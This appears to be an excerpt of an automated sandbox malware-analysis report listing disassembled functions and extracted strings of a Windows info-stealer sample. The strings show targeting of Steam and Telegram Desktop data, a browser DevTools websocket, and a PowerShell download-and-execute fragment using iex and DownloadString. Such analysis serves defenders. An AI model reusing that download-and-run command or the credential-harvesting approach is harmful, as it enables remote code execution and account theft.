                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcatmemcmpstrlen$CloseFileFindFirstOpenQueryValuelstrcpywsprintf
                                                                                                                                                                                                                                                                                      • String ID: Software\Valve\Steam$SteamPath$\config\
                                                                                                                                                                                                                                                                                      • API String ID: 393122709-2561568711
                                                                                                                                                                                                                                                                                      • Opcode ID: 5586b393047b28cf48fe9dec46dc0ec11d4a7ee0403769a6eb676b6b1167209c
                                                                                                                                                                                                                                                                                      • Instruction ID: 85194e8d5805dad303305febaf6046d54008d8169596ab7e5b376dc9a1cdcd29
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5586b393047b28cf48fe9dec46dc0ec11d4a7ee0403769a6eb676b6b1167209c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAC17131C107489ADB01EF64C9C15FA73B8AF6D318F019289FD496A017EB78BAD4CB94
                                                                                                                                                                                                                                                                                      Function 00406BC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 115stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404EA0: InternetOpenA.WININET(?,?,?,?,00002407), ref: 00404ECB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404EA0: memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00404FDC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404EA0: memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00405045
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00002407), ref: 00406F38
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004053F0: strlen.MSVCRT ref: 00405409
                                                                                                                                                                                                                                                                                        • Part of subcall function 004053F0: memchr.MSVCRT ref: 00405456
                                                                                                                                                                                                                                                                                        • Part of subcall function 004053F0: memcmp.MSVCRT(00000000,?,00000000), ref: 0040546E
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040ED20: memcpy.MSVCRT(00000000,?,0000000F,00000000,-00000001,76EC5E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDD8
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406C44
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000009,ws://localhost:9223,00000009,?,00002407), ref: 00406C58
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000009,00000000), ref: 00406C65
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$lstrcat$??3@InternetOpenmemchrmemcmpmemmovememsetstrlen
                                                                                                                                                                                                                                                                                      • String ID: /devtools$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                      • API String ID: 2141826376-2676143373
                                                                                                                                                                                                                                                                                      • Opcode ID: d6df93589ec94bd32190cbd0c7d779cd049acc16d756cf596e2cae93c0837182
                                                                                                                                                                                                                                                                                      • Instruction ID: 91c73b424bc1f2f560fb80e69d34ff2093765c111021dba20f9d1d410260af79
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6df93589ec94bd32190cbd0c7d779cd049acc16d756cf596e2cae93c0837182
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8731C9719002185BEB14AB65DC49BEFB775AF41308F41006EF506772C2DB7C1A85CBA9
                                                                                                                                                                                                                                                                                      Function 00416330 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 247stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,0000001A,?,00000104), ref: 00416367
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\Telegram Desktop\), ref: 00416376
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: wsprintfA.USER32 ref: 00415DBE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: FindFirstFileA.KERNEL32(?,?), ref: 00415DCF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: strlen.MSVCRT ref: 00415F1C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415F5B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: strlen.MSVCRT ref: 00415FC7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00416004
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcatmemcmpstrlen$FileFindFirstFolderPathlstrcpywsprintf
                                                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$C:\ProgramData\$Soft$\Telegram Desktop\
                                                                                                                                                                                                                                                                                      • API String ID: 2540414856-1297282028
                                                                                                                                                                                                                                                                                      • Opcode ID: ce9cec25618399da20032b62709044c55674dbe8e7e8a6d5c3bdf33b24c8f7cb
                                                                                                                                                                                                                                                                                      • Instruction ID: 64e18173e81040c63563a2c948d1254a8cd49f8bd4ee544822172e8b9e7dfe6d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce9cec25618399da20032b62709044c55674dbe8e7e8a6d5c3bdf33b24c8f7cb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09B19571810B4EA7DB00EF75C9858D9B768BF69308F40924AFD0952502EB78F6E8CBD4
                                                                                                                                                                                                                                                                                      Function 00412400 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 132COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                      • ShellExecuteEx.SHELL32(?), ref: 00412560
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$lstrcatlstrlen$ExecuteShellSystemTimememset
                                                                                                                                                                                                                                                                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                      • API String ID: 1675527290-38637897
                                                                                                                                                                                                                                                                                      • Opcode ID: 04e0a849c7175668f7dfbabee4cdcea548fc796aeff486efc7e20cc012ef2f47
                                                                                                                                                                                                                                                                                      • Instruction ID: 334dd5afd32dd1eb1b8252b2cfcba07153a0a01eb84f6ed827c6dd8a75e550bd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04e0a849c7175668f7dfbabee4cdcea548fc796aeff486efc7e20cc012ef2f47
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6418A303103146BD654BB6299A6BAF7A595BC4758F40045E784B1F283CEBC5CC5C7EE
                                                                                                                                                                                                                                                                                      Function 00411D20 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00411D72
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,000000FA), ref: 00411D80
                                                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00411D8F
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00411E21
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00411E3C
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00411E4B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$Heap$AllocCloseHandleOpenTerminatewsprintf
                                                                                                                                                                                                                                                                                      • String ID: %hs
                                                                                                                                                                                                                                                                                      • API String ID: 2756667156-2783943728
                                                                                                                                                                                                                                                                                      • Opcode ID: bfd91a03897fc7cdf9307d1a4434efb42ed2110cc448090386432cb08c4c10e8
                                                                                                                                                                                                                                                                                      • Instruction ID: 5d8af7fbd58c0c14971e09abe29c4d5a15048916ed38c030ba04a2c092a42a15
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfd91a03897fc7cdf9307d1a4434efb42ed2110cc448090386432cb08c4c10e8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E731C130608341ABD3109F60ED48BAFB7E9EFD5744F00591EF985821A0EB7499C4CA5B
                                                                                                                                                                                                                                                                                      Function 0040F9B0 Relevance: 10.8, APIs: 7, Instructions: 265stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F9BC
                                                                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT ref: 0040F9DE
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040F890: strlen.MSVCRT ref: 0040F899
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040F890: strlen.MSVCRT ref: 0040F8D6
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F9FE
                                                                                                                                                                                                                                                                                      • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0040FAA0
                                                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,00064000,00000000,?,?,00000000), ref: 0040FB5E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: strlen$MemoryProcessQueryReadVirtualmemset
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3741619940-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c617cb530a7beb5f6651db65b09bd67427ed6a4aab75091136474a9db1aa80fd
                                                                                                                                                                                                                                                                                      • Instruction ID: 5f3e5458c0cb4e82bdfb47d3dacbfc32efe29669a25e4631f25e2303d30cacff
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c617cb530a7beb5f6651db65b09bd67427ed6a4aab75091136474a9db1aa80fd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0A159716083018BD328DF24D891A3BB7E2FF94704F14893EE58697791E738E849CB5A
                                                                                                                                                                                                                                                                                      Function 004120F0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 239COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
